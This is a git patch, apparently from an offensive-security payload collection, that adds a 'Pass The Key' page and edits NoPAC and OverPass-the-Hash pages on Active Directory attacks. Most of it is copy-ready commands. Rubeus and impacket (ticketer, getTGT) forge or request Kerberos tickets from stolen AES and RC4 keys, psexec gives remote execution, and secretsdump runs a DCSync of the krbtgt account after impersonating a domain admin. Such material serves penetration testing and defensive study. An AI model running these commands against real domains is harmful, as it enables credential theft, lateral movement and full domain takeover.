From d603ecc3b8200aacd517cfb6da8d13980c4c7d5c Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Sun, 27 Oct 2024 15:29:34 +0100 Subject: [PATCH] Pass The Key --- docs/active-directory/CVE/NoPAC.md | 7 ++- .../hash-over-pass-the-hash.md | 8 +-- docs/active-directory/hash-pass-the-key.md | 57 +++++++++++++++++++ 3 files changed, 63 insertions(+), 9 deletions(-) create mode 100644 docs/active-directory/hash-pass-the-key.md diff --git a/docs/active-directory/CVE/NoPAC.md b/docs/active-directory/CVE/NoPAC.md index 847f860..5665997 100644 --- a/docs/active-directory/CVE/NoPAC.md +++ b/docs/active-directory/CVE/NoPAC.md @@ -32,7 +32,7 @@ ``` 1. Clear the controlled machine account `servicePrincipalName` attribute ```ps1 - impacket@linux> addspn.py -u 'domain\user' -p 'password' -t 'ControlledComputer$' -c DomainController + krbrelayx@linux> addspn.py -u 'domain\user' -p 'password' -t 'ControlledComputer$' -c DomainController powershell@windows> . .\Powerview.ps1 powershell@windows> Set-DomainObject "CN=ControlledComputer,CN=Computers,DC=domain,DC=local" -Clear 'serviceprincipalname' -Verbose @@ -63,7 +63,10 @@ cmd@windows> Rubeus.exe s4u /self /impersonateuser:"DomainAdmin" /altservice:"ldap/DomainController.domain.local" /dc:"DomainController.domain.local" /ptt /ticket:[Base64 TGT] ``` -6. DCSync: `KRB5CCNAME='DomainAdmin.ccache' secretsdump.py -just-dc-user 'krbtgt' -k -no-pass -dc-ip 'DomainController.domain.local' @'DomainController.domain.local'` +6. DCSync + ```ps1 + KRB5CCNAME='DomainAdmin.ccache' secretsdump.py -just-dc-user 'krbtgt' -k -no-pass -dc-ip 'DomainController.domain.local' @'DomainController.domain.local' + ``` Automated exploitation: diff --git a/docs/active-directory/hash-over-pass-the-hash.md b/docs/active-directory/hash-over-pass-the-hash.md index 4ebb9ac..f501f2e 100644 --- a/docs/active-directory/hash-over-pass-the-hash.md +++ b/docs/active-directory/hash-over-pass-the-hash.md @@ -1,6 +1,6 @@ # Hash - OverPass-the-Hash -In this technique, instead of passing the hash directly, we use the NT hash of an account to request a valid Kerberost ticket (TGT). +> In this technique, instead of passing the hash directly, we use the NT hash of an account to request a valid Kerberost ticket (TGT). ### Using impacket @@ -10,9 +10,6 @@ root@kali:~$ python ./getTGT.py -hashes ":1a59bd44fe5bec39c44c8cd3524dee" lab.ro root@kali:~$ export KRB5CCNAME="/root/impacket-examples/velociraptor.ccache" root@kali:~$ python3 psexec.py "jurassic.park/velociraptor@labwws02.jurassic.park" -k -no-pass -# also with the AES Key if you have it -root@kali:~$ ./getTGT.py -aesKey xxxxxxxxxxxxxxkeyaesxxxxxxxxxxxxxxxx lab.ropnop.com - root@kali:~$ ktutil -k ~/mykeys add -p tgwynn@LAB.ROPNOP.COM -e arcfour-hma-md5 -w 1a59bd44fe5bec39c44c8cd3524dee --hex -V 5 root@kali:~$ kinit -t ~/mykers tgwynn@LAB.ROPNOP.COM root@kali:~$ klist @@ -26,9 +23,6 @@ root@kali:~$ klist # NOTE: Make sure to clear tickets in the current session (with 'klist purge') to ensure you don't have multiple active TGTs .\Rubeus.exe asktgt /user:Administrator /rc4:[NTLMHASH] /ptt -# More stealthy variant, but requires the AES256 hash -.\Rubeus.exe asktgt /user:Administrator /aes256:[AES256HASH] /opsec /ptt - # Pass the ticket to a sacrificial hidden process, allowing you to e.g. steal the token from this process (requires elevation) .\Rubeus.exe asktgt /user:Administrator /rc4:[NTLMHASH] /createnetonly:C:\Windows\System32\cmd.exe ``` \ No newline at end of file diff --git a/docs/active-directory/hash-pass-the-key.md b/docs/active-directory/hash-pass-the-key.md new file mode 100644 index 0000000..1d4c5af --- /dev/null +++ b/docs/active-directory/hash-pass-the-key.md @@ -0,0 +1,57 @@ +# Hash - Pass The Key + +Pass The Key allows attackers to gain access to systems by using a valid session key instead of the user's password or NTLM hash. This technique is related to other credential-based attacks like Pass The Hash (PTH) and Pass The Ticket (PTT) but specifically uses session keys to authenticate. + +Pre-authentication requires the requesting user to provide a secret key, which is derived from their password and may use encryption algorithms such as DES, RC4, AES128, or AES256. + +* **RC4**: ARCFOUR-HMAC-MD5 (23), in this format, this is the NTLM hash, go to **Pass The Hash** to use it directly and **Over Pass The Hash** page to request a TGT from it. +* **DES**: DES3-CBC-SHA1 (16), should not be used anymore and have been deprecated since 2018 ([RFC 8429](https://www.rfc-editor.org/rfc/rfc8429)). +* **AES128**: AES128-CTS-HMAC-SHA1-96 (17), both AES encryption algorithms can be used with Impacket and Rubeus tools. +* **AES256**: AES256-CTS-HMAC-SHA1-96 (18) + +In the past, there were more encryptions methods, that have now been deprecated. + +| enctype | weak?| krb5 | Windows | +| -------------------------- | ---- | ------ | ------- | +| des-cbc-crc | weak | <1.18 | >=2000 | +| des-cbc-md4 | weak | <1.18 | ? | +| des-cbc-md5 | weak | <1.18 | >=2000 | +| des3-cbc-sha1 | | >=1.1 | none | +| arcfour-hmac | | >=1.3 | >=2000 | +| arcfour-hmac-exp | weak | >=1.3 | >=2000 | +| aes128-cts-hmac-sha1-96 | | >=1.3 | >=Vista | +| aes256-cts-hmac-sha1-96 | | >=1.3 | >=Vista | +| aes128-cts-hmac-sha256-128 | | >=1.15 | none | +| aes256-cts-hmac-sha384-192 | | >=1.15 | none | +| camellia128-cts-cmac | | >=1.9 | none | +| camellia256-cts-cmac | | >=1.9 | none | + +Microsoft Windows releases Windows 7 and later disable single-DES enctypes by default. + + +Either use the AES key to generate a ticket with `ticketer`, or request a new TGT using `getTGT.py` script from Impacket. + +## Generate a new ticket + +* [fortra/impacket/ticketer.py](https://github.com/fortra/impacket/blob/master/examples/ticketer.py) + ```powershell + impacket-ticketer -aesKey 2ef70e1ff0d18df08df04f272df3f9f93b707e89bdefb95039cddbadb7c6c574 -domain lab.local Administrator -domain-sid S-1-5-21-2218639424-46377867-3078535060 + ``` + +## Request a TGT + +* [fortra/impacket/getTGT.py](https://github.com/fortra/impacket/blob/master/examples/getTGT.py) + ```powershell + impacket-getTGT -aesKey 2ef70e1ff0d18df08df04f272df3f9f93b707e89bdefb95039cddbadb7c6c574 lab.local + ``` + +* [GhostPack/Rubeus](https://github.com/GhostPack/Rubeus) + ```powershell + .\Rubeus.exe asktgt /user:Administrator /aes128 bc09f84dcb4eabccb981a9f265035a72 /ptt + .\Rubeus.exe asktgt /user:Administrator /aes256:2ef70e1ff0d18df08df04f272df3f9f93b707e89bdefb95039cddbadb7c6c574 /opsec /ptt + ``` + + +## References + +* [MIT Kerberos Documentation - Encryption types](https://web.mit.edu/kerberos/krb5-1.18/doc/admin/enctypes.html) \ No newline at end of file